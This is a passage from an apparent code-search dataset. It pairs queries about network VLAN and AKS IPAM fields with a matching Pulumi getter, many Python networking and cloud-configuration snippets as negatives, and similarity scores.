"def get_group_name(name: str) -> str:\n if is_shortcut_name(name):\n return name.split(config.name_separator)[0]\n raise CHCShortCutNameError(name)",
"def subnet_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_group_name\")",
"def subnet_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_group_name\")",
"def getName(self):\n return _libsbml.GroupsExtension_getName(self)",
"def get_security_group_short_name(self):\n return self.config['security_group']",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")"
] | [
"0.8591477",
"0.8364604",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.81754756",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.80501395",
"0.7925756",
"0.79149616",
"0.7895402",
"0.78135264",
"0.7751866",
"0.76719135",
"0.76436806",
"0.76436806",
"0.7622679",
"0.75345165",
"0.75345165",
"0.75141597",
"0.74826163",
"0.7394228",
"0.7359348",
"0.7359348",
"0.7290963",
"0.7290442",
"0.7241512",
"0.72162044",
"0.7204304",
"0.7204304",
"0.7093726",
"0.70841795",
"0.70780027",
"0.7062088",
"0.7047625",
"0.7047625",
"0.7018684",
"0.7011551",
"0.6988667",
"0.6988667"
] | 0.80879456 | 52 |
The VLAN from the l3IsolationDomain that is used for this network. | def vlan(self) -> pulumi.Input[float]:
return pulumi.get(self, "vlan") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def vlan(self) :\n\t\ttry :\n\t\t\treturn self._vlan\n\t\texcept Exception as e:\n\t\t\traise e",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetVlanTag', self.handle)",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetVlanTag', self.handle)",
"def vlan(self) -> pulumi.Output[float]:\n return pulumi.get(self, \"vlan\")",
"def get_vlan(self, vlan_id):\r\n return self.vlan.getObject(id=vlan_id, mask=DEFAULT_VLAN_MASK)",
"def VlanId(self):\n if self.force_auto_sync:\n self.get('VlanId')\n return self._VlanId",
"def multicast_vlan(self):\n if self.segment.multicast_vlan_policy == \"d\":\n return None\n elif self.segment.multicast_vlan_policy == \"e\":\n return self.segment.multicast_vlan\n else:\n return self.segment.profile.multicast_vlan",
"def vlanChoice(self):\r\n idx = self.m_shuffleSeq[self.m_Cnt]\r\n self._vlanChoice = self.m_vlanSeq[idx]\r\n self.m_Cnt = (self.m_Cnt + 1) % self._wrMaxLen\r\n return self._vlanChoice",
"def management_vlan(self):\n if self.segment.management_vlan_policy == \"d\":\n return None\n elif self.segment.management_vlan_policy == \"e\":\n return self.segment.management_vlan\n else:\n return self.segment.profile.management_vlan",
"def InnerVlanId(self):\n if self.force_auto_sync:\n self.get('InnerVlanId')\n return self._InnerVlanId",
"def FlowStatVlanId(self):\n\t\treturn self._get_attribute('flowStatVlanId')",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def _extract_vlan(vlan):\n try:\n return re.match(r'vlan-(\\d+)', vlan).group(1)\n except:\n return None",
"def VlanPriority(self):\n if self.force_auto_sync:\n self.get('VlanPriority')\n return self._VlanPriority",
"def vlans(self):\n if self._vlans is None:\n self._vlans = self._show_vlan()\n\n return self._vlans",
"def FlowStatVlanPriority(self):\n\t\treturn self._get_attribute('flowStatVlanPriority')",
"def vlan_get(self, vlan_id):\n # return True/False\n raise NotImplementedError",
"def get_vlan_from_int(dev, int_name):\n return dev.get_interfaces()[int_name]",
"def show_vlan(self, vlan=None, vdc=None):\n for vdcname in vdc:\n print \"VDC: {}\".format(vdcname)\n if vlan is not None and vlan in self.vdcs[vdcname].get_vlans_list():\n print self.vdcs[vdcname].vlans[vlan]\n else:\n for v in self.vdcs[vdcname].vlans:\n print self.vdcs[vdcname].vlans[v]",
"def get_vnet_subnet_id(self) -> Union[str, None]:\n return self.agentpool_context.get_vnet_subnet_id()",
"def FlowAggregatedStatVlanId(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanId')",
"def build(cls, name, enc, networkcfg):\n static = (networkcfg[name] if name in networkcfg\n else networkcfg[networkcfg.default_section])\n vlan = VLAN(name, enc, static)\n if vlan.policy == 'untagged':\n return UntaggedPolicy(vlan)\n elif vlan.policy == 'tagged':\n return TaggedPolicy(vlan)\n elif vlan.policy == 'transit':\n return TransitPolicy(vlan)\n elif vlan.policy == 'ipmi':\n return IPMIPolicy(vlan)\n elif vlan.policy == 'puppet':\n raise RuntimeError(\n 'should never been called with \"puppet\" policy', vlan)\n raise ValueError(\n 'unknown network policy for VLAN {}'.format(vlan.name),\n vlan.policy)",
"def lan_address(self):\n return self._lan_address",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n return self._current_dev_manager.read_mac_address_vlan(vid=vid)",
"def tempest_cinder_glance_swift_vlan(self):\n self.helper_cinder_glance_swift('vlan')",
"def get_switch_local_vlan_id(self, rpc_context, **kwargs):\n port_id = kwargs.get('port_id')\n host_name = kwargs.get('host_name')\n if self.rpc_handler is None:\n return\n context = {'port_id': str(port_id), 'host_name': str(host_name)}\n\n response = None\n try:\n response = self.rpc_handler.get_switch_local_vlan_id(context)\n except:\n pass\n return response",
"def virtual_network_subnet_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n raise NotImplementedError",
"def set_vlan_tag(self, nVlanTag):\n\t\tcall_sdk_function('PrlVirtNet_SetVlanTag', self.handle, nVlanTag)",
"def vm_vlan_num_in(self, vm_vlan_num_in):\n\n self._vm_vlan_num_in = vm_vlan_num_in",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def add_vlan(self, vlan):\n logger.info('adding vlan: %s' % vlan.name)\n data = self._add_common(vlan)\n logger.debug('vlan data: %s' % data)\n self.interface_data[vlan.name] = data\n if vlan.routes:\n self._add_routes(vlan.name, vlan.routes)",
"def vz0(self):\n return self.params['vz0']",
"def FlowAggregatedStatVlanPriority(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanPriority')",
"def read_port_vlan_info(self, port: int) -> Vlans:\n return self._current_dev_manager.read_port_vlan_info(port=port)",
"def get_ifvlan_index(self, ifvlan_id):\n index = -1\n for i in range(len(info_populator.InfoPopulator.IFVLAN_IDS)):\n if ifvlan_id == info_populator.InfoPopulator.IFVLAN_IDS[i]:\n index = i\n break\n else:\n self.fail(\n \"could not find the index of interface vlan: %s\" %\n ifvlan_id)\n\n return index",
"def _getvlanlistqos(self):\n self.activeL2 = []\n for _key, vals in self.activeDeltas.get('output', {}).get('vsw', {}).items():\n if self.hostname not in vals:\n continue\n if not self._started(vals):\n # This resource has not started yet. Continue.\n continue\n for key, vals1 in vals[self.hostname].items():\n self.activeL2.append({'destport': key,\n 'vlan': vals1.get('hasLabel', {}).get('value', ''),\n 'params': vals1.get('hasService', {})})",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def cap_net_vlan_provisioning_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_net_vlan_provisioning_ind\"), kwargs)",
"def set_vlan_interface(self, interface, vlan, vdc=None):\n\n assert isinstance(vlan, str)\n assert isinstance(interface, str)\n assert isinstance(vdc, list)\n\n self.logger.debug(\"Adding vlan {} on interface {} on {}\".format(vlan, interface, self.host))\n interface = interface.title()\n vlan_created = None\n\n if len(vdc) != 1:\n raise ValueError(\"Interface {} cannot exist in multiple vdcs {}\".format(interface, self.host))\n vdc = vdc[0]\n if not self.vdcs[vdc].check_interface(interface):\n raise ValueError(\n \"Interface {} does not exist in vdc {} on {}\".format(interface, vdc, self.host))\n if not self.vdcs[vdc].check_vlan(vlan):\n self.set_vlan(vlan)\n vlan_created = [vlan]\n\n self.switchto_vdc(vdc)\n\n commands = ['config t ; interface {}'.format(interface)]\n configured = False\n\n if not self.vdcs[vdc].check_interface_vlan(interface, vlan):\n if self.vdcs[vdc].interfaces[interface].switchport == 'access':\n commands.append('switchport access vlan {}'.format(vlan))\n elif self.vdcs[vdc].interfaces[interface].switchport == 'trunk':\n commands.append('switchport trunk allowed vlan add {}'.format(vlan))\n else:\n raise ValueError(\n \"Interface {} in vdc {} on {} is not access or trunk\".format(interface, self.current_vdc,\n self.host))\n else:\n configured = True\n\n if not configured:\n try:\n self._send_xml_cli(commands)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stacktrace = traceback.extract_tb(exc_traceback)\n self.logger.error(\"VLAN {} configuration for interface {} on {} failed\".format(vlan, interface, self.host))\n self.logger.debug(sys.exc_info())\n self.logger.debug(stacktrace)\n else:\n self.get_interfaces(vdc=vdc)\n\n return vlan_created",
"def _is_vlan_router_interface_supported(self):",
"def purchase_vlan(self, vlan_name, debug=False):\n vlan_name = {'VLanName': vlan_name}\n json_scheme = self.gen_def_json_scheme('SetPurchaseVLan', vlan_name)\n json_obj = self.call_method_post(method=\"SetPurchaseVLan\", json_scheme=json_scheme)\n if debug is True:\n self.logger.debug(json_obj)\n if json_obj['Success'] is False:\n raise Exception(\"Cannot purchase new vlan.\")\n vlan = Vlan()\n vlan.name = json_obj['Value']['Name']\n vlan.resource_id = json_obj['Value']['ResourceId']\n vlan.vlan_code = json_obj['Value']['VlanCode']\n return vlan",
"def ms_get_management_vlan(self):\n self.open_route('/configure/switch_settings', \"Switch\")\n textarea_value = page_utils.get_input_var_value(\n self.get_page(),\n var_id='node_group_management_vlan')\n return textarea_value",
"def virtual_network(self):\n return self.broker.virtual_network(**{\"VirtualNetworkMemberID\": self.VirtualNetworkMemberID})",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def is_provider_vlan(vlan_id):\n session = db.get_session()\n if (session.query(network_models_v2.ProviderNetwork).\n filter_by(network_type=const.NETWORK_TYPE_VLAN,\n segmentation_id=vlan_id).first()):\n return True",
"def _support_vlan_router_interfaces(self):\n pass",
"def validate_vlan(vlan_id, meraki_net):\n check_vlan = False\n vlan_name = \"\"\n api_uri = f\"/v0/networks/{meraki_net}/vlans/{vlan_id}\"\n data = get_meraki_api_data(api_uri)\n if data:\n check_vlan = True\n vlan_name = data[\"name\"].strip()\n else:\n check_vlan = False\n return check_vlan, vlan_name",
"def read_port_vlan_info(self, port: int) -> Vlans:\n raise NotImplementedError",
"def system_vlan_num_in(self, system_vlan_num_in):\n\n self._system_vlan_num_in = system_vlan_num_in",
"def _get_tunnel_vif(self):\n return self.__tunnel_vif",
"def list_vlans(self, datacenter=None, vlan_number=None, name=None,\r\n **kwargs):\r\n _filter = NestedDict(kwargs.get('filter') or {})\r\n\r\n if vlan_number:\r\n _filter['networkVlans']['vlanNumber'] = query_filter(vlan_number)\r\n\r\n if name:\r\n _filter['networkVlans']['name'] = query_filter(name)\r\n\r\n if datacenter:\r\n _filter['networkVlans']['primaryRouter']['datacenter']['name'] = \\\r\n query_filter(datacenter)\r\n\r\n kwargs['filter'] = _filter.to_dict()\r\n\r\n if 'mask' not in kwargs:\r\n kwargs['mask'] = DEFAULT_VLAN_MASK\r\n\r\n return self.account.getNetworkVlans(**kwargs)",
"def virtual_router_ip(self):\n return self._virtual_router_ip",
"def get_vlans():\n query = {\"type\": \"op\", \"cmd\": \"<show><vlan>all</vlan></show>\"}\n\n return __proxy__[\"panos.call\"](query)",
"def vm_vlan_num_lt(self, vm_vlan_num_lt):\n\n self._vm_vlan_num_lt = vm_vlan_num_lt",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def cap_voice_vlan_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_voice_vlan_ind\"), kwargs)",
"def lan_address(self):\n _, port = self._socket.getsockname()\n return (\"127.0.0.1\", port)",
"def _get_vlist(self, vlist):\n if vlist == \"all\":\n return list(range(1, 4095))\n elif vlist == \"none\":\n return []\n elif type(vlist) is not list:\n raise Exception(\"Unexpected vlan list: \" + str(vlist))\n else:\n return vlist",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def VplsIdIpAddress(self):\n return self._get_attribute('vplsIdIpAddress')",
"def deploy_neutron_vlan(self):\n self.env.revert_snapshot(\"ready_with_3_slaves\")\n\n cluster_id = self.fuel_web.create_cluster(\n name=self.__class__.__name__,\n mode=DEPLOYMENT_MODE,\n settings={\n \"net_provider\": 'neutron',\n \"net_segment_type\": NEUTRON_SEGMENT['vlan'],\n 'tenant': 'simpleVlan',\n 'user': 'simpleVlan',\n 'password': 'simpleVlan'\n }\n )\n self.fuel_web.update_nodes(\n cluster_id,\n {\n 'slave-01': ['controller'],\n 'slave-02': ['compute'],\n 'slave-03': ['compute']\n }\n )\n self.fuel_web.deploy_cluster_wait(cluster_id)\n\n cluster = self.fuel_web.client.get_cluster(cluster_id)\n assert_equal(str(cluster['net_provider']), 'neutron')\n\n self.fuel_web.verify_network(cluster_id)\n\n self.fuel_web.run_ostf(\n cluster_id=cluster_id)\n\n self.env.make_snapshot(\"deploy_neutron_vlan\", is_make=True)",
"def subnet_id(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_id\")",
"def get_virtual_network_id(self):\n\t\treturn call_sdk_function('PrlVmDevNet_GetVirtualNetworkId', self.handle)",
"def add_vlan(self, vlan_number, vlan_pool_name):\n class_query = ClassQuery('fvnsVlanInstP')\n class_query.propFilter = 'eq(fvnsVlanInstP.name, \"' + VLAN_POOL_PREFIX + vlan_pool_name + '\")'\n vp_list = self.moDir.query(class_query)\n # If the vlan pool does not exists, create it with the physical domain and the attachable entity profile\n if len(vp_list) == 0:\n VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))\n self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))\n else:\n VlanInstP_mo = vp_list[0]\n encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),\n VLAN_PREFIX + str(vlan_number), allocMode='static')\n self.commit(encap_mo)",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def get_lane(self):\n return self.lane",
"def _get_l2vni(self):\n return self.__l2vni",
"def system_vlan_num_lt(self, system_vlan_num_lt):\n\n self._system_vlan_num_lt = system_vlan_num_lt",
"def _isVLAN(v):\n #if not v or not type(v) is (string): return 0\n v = v.replace(',','')\n v = v.replace('-','')\n for char in v:\n if re.compile('[0-9]+').match(char) == None:return 0\n return 1",
"def getlan():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n lan = str(s.getsockname()[0])\n s.close()\n except socket.error:\n s.close()\n sys.exit('>> Unable to find LAN IP')\n\n return lan",
"def _create_vlan(self, conn, vlan_id, vlan_name):\n\n req_js = {}\n req_js['vlan_id'] = vlan_id\n req_js['vlan_name'] = vlan_name\n req_js['admin_state'] = 'up'\n\n resp = conn.post(self.VLAN_REST_OBJ, req_js)\n self._check_process_resp(resp)",
"def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def lun(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"lun\")",
"def vat_number(self):\n return self._vat_number",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def _get_ethernet_tag(self):\n return self.__ethernet_tag",
"def system_vlan_num(self, system_vlan_num):\n\n self._system_vlan_num = system_vlan_num",
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def vm_vlan_num(self, vm_vlan_num):\n\n self._vm_vlan_num = vm_vlan_num",
"def common_values(self):\n vlan = self.vlan\n return dict(\n addr4=vlan.addrs(4),\n addr6=vlan.addrs(6),\n addresses=vlan.addrs(),\n gateways=vlan.gateways_filtered(),\n iface=vlan.iname(),\n mac=vlan.mac,\n metric=vlan.metric,\n mtu=vlan.mtu,\n nets4=vlan.nets(4),\n nets6=vlan.nets(6),\n nets=vlan.nets(),\n vlan=vlan.name,\n )",
"def __init__(self, vlan_id):\n self.vlan_id = vlan_id\n self.action_type = 'set_vlan'",
"def vlan_create(handle, name, vlan_id, sharing=\"none\",\r\n mcast_policy_name=\"\", compression_type=\"included\",\r\n default_net=\"no\", pub_nw_name=\"\", parent_dn=\"fabric/lan\"):\r\n from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan\r\n\r\n obj = handle.query_dn(parent_dn)\r\n if obj:\r\n vlan = FabricVlan(parent_mo_or_dn=obj,\r\n sharing=sharing,\r\n name=name,\r\n id=vlan_id,\r\n mcast_policy_name=mcast_policy_name,\r\n policy_owner=\"local\",\r\n default_net=default_net,\r\n pub_nw_name=pub_nw_name,\r\n compression_type=compression_type)\r\n\r\n handle.add_mo(vlan, modify_present=True)\r\n handle.commit()\r\n else:\r\n log.info(parent_dn + \" MO is not available\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def _tenant_network(self):\n port = self._connection.network.ports.find_by_device_owner('network:router_interface')\n if port:\n return self._connection.network.networks.get(port.network_id)\n else:\n raise errors.ImproperlyConfiguredError('Could not find tenancy network')",
"def subnet_id(self):\n return self._subnet_id",
"def name(self):\n return 'VL53L1X'",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def RouteDistinguisherIpAddress(self):\n return self._get_attribute('routeDistinguisherIpAddress')",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def create_vlan(module, switch, vlan_id, untagged_ports=None):\n global CHANGED_FLAG\n output = ''\n new_vlan = False\n\n cli = pn_cli(module)\n cli += ' vlan-show format id no-show-headers '\n existing_vlans = run_cli(module, cli)\n\n if existing_vlans is not None:\n existing_vlans = existing_vlans.split()\n if vlan_id not in existing_vlans:\n new_vlan = True\n\n if new_vlan or existing_vlans is None:\n cli = pn_cli(module)\n cli += ' vlan-create id %s scope fabric ' % vlan_id\n\n if untagged_ports is not None:\n cli += ' untagged-ports %s ' % untagged_ports\n\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created vlan with id %s\\n' % (switch, vlan_id)\n\n return output"
] | [
"0.7999924",
"0.7726699",
"0.7723152",
"0.75627106",
"0.6896781",
"0.68907255",
"0.66186804",
"0.6475853",
"0.6435667",
"0.64156556",
"0.6283416",
"0.62097275",
"0.62097275",
"0.62045115",
"0.579412",
"0.5772401",
"0.57347697",
"0.56815064",
"0.5577279",
"0.5575757",
"0.5513762",
"0.53874314",
"0.5357877",
"0.5307194",
"0.52880514",
"0.52356",
"0.52324003",
"0.52150667",
"0.5205583",
"0.5205424",
"0.5182322",
"0.5181402",
"0.5181402",
"0.5166206",
"0.51448596",
"0.5138239",
"0.5129257",
"0.5125093",
"0.51002944",
"0.5092885",
"0.5092885",
"0.5092885",
"0.5091799",
"0.50541705",
"0.5048843",
"0.5019748",
"0.49930835",
"0.49746278",
"0.4960606",
"0.49599355",
"0.495937",
"0.49576157",
"0.49480367",
"0.4940397",
"0.493007",
"0.4917736",
"0.49088886",
"0.4890636",
"0.48739162",
"0.4867709",
"0.4861594",
"0.48556358",
"0.4849366",
"0.48490348",
"0.48423594",
"0.48384184",
"0.48313564",
"0.48265526",
"0.48254472",
"0.4822892",
"0.4809546",
"0.4808165",
"0.48000398",
"0.47978896",
"0.47975978",
"0.47915488",
"0.47674677",
"0.47535634",
"0.47476095",
"0.47443464",
"0.4732304",
"0.47172344",
"0.47172084",
"0.4706235",
"0.46897304",
"0.46748835",
"0.46580702",
"0.4656013",
"0.46523625",
"0.46487445",
"0.46460047",
"0.46415251",
"0.46415251",
"0.46406233",
"0.46358407",
"0.4633533",
"0.46328533",
"0.46235913",
"0.4622502",
"0.458832"
] | 0.74945563 | 4 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The indicator of whether or not to disable IPAM allocation on the network attachment definition injected into the Hybrid AKS Cluster. | def hybrid_aks_ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]]:
return pulumi.get(self, "hybrid_aks_ipam_enabled") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'L3NetworkConfigurationIpamEnabled']]]:\n return pulumi.get(self, \"ipam_enabled\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allow_v_net_override(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def allowNoIngressLabel(self):\n if self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def __init__(__self__, *,\n disable_outbound_nat: Optional[pulumi.Input[bool]] = None):\n if disable_outbound_nat is not None:\n pulumi.set(__self__, \"disable_outbound_nat\", disable_outbound_nat)",
"def setDefaultCapability(self, b):\n self.defaultAllow = b",
"def allow_v_net_override(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n ipv4_cidr_block: Optional[pulumi.Input[str]] = None,\n use_service_networking: Optional[pulumi.Input[bool]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if ipv4_cidr_block is not None:\n pulumi.set(__self__, \"ipv4_cidr_block\", ipv4_cidr_block)\n if use_service_networking is not None:\n pulumi.set(__self__, \"use_service_networking\", use_service_networking)",
"def nfc_beam_disabled(self):\n return self._nfc_beam_disabled",
"def disable_outbound_nat(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_outbound_nat\")",
"def setAllowAnnotations(self,value):\n self.PDFreactorConfiguration.in1[\"allowAnnotations\"] = value",
"def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def privacy_protocol_not(self, privacy_protocol_not):\n\n self._privacy_protocol_not = privacy_protocol_not",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def allowNoIngressLabel(self):\n if (self.ingresslabels != None):\n return self.ingresslabels.isempty()\n elif self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def enable_network_egress_metering(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_network_egress_metering\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def reason_to_be_disabled(cls):\n # Assume by default the given decoder is always enabled.\n return None",
"def client_ip_preservation_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"client_ip_preservation_enabled\")",
"def pre_network_ipam_create(self, resource_dict):\n pass",
"def disable_openapi_validation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def is_disable_apic(self):\n\t\treturn bool(call_sdk_function('PrlVmCfg_IsDisableAPIC', self.handle))",
"def deny(ip):\n return __apf_cmd(\"-d {}\".format(ip))",
"def disable():\n if _status_apf():\n return __apf_cmd(\"-f\")",
"def enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n\n return pulumi.get(self, \"enabled\")",
"def only_use_host_ips(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"only_use_host_ips\")",
"def disable_probe(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_probe\")",
"def disable_suppress_accessibility_service(self) -> Optional[bool]:\n return self.get_capability(DISABLE_SUPPRESS_ACCESSIBILITY_SERVICE)",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def get_disable_vpa(self) -> bool:\n return self._get_disable_vpa(enable_validation=True)",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def require_privmsg():\n def add_attribute(func):\n if not hasattr(func, \"priv_msg\"):\n func.priv_msg = True\n return func\n return add_attribute",
"def enable_node_autoprovisioning(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_node_autoprovisioning\")",
"def publicly_advertisable(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def disable_bgp_route_propagation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"disabled_by_microsoft\")",
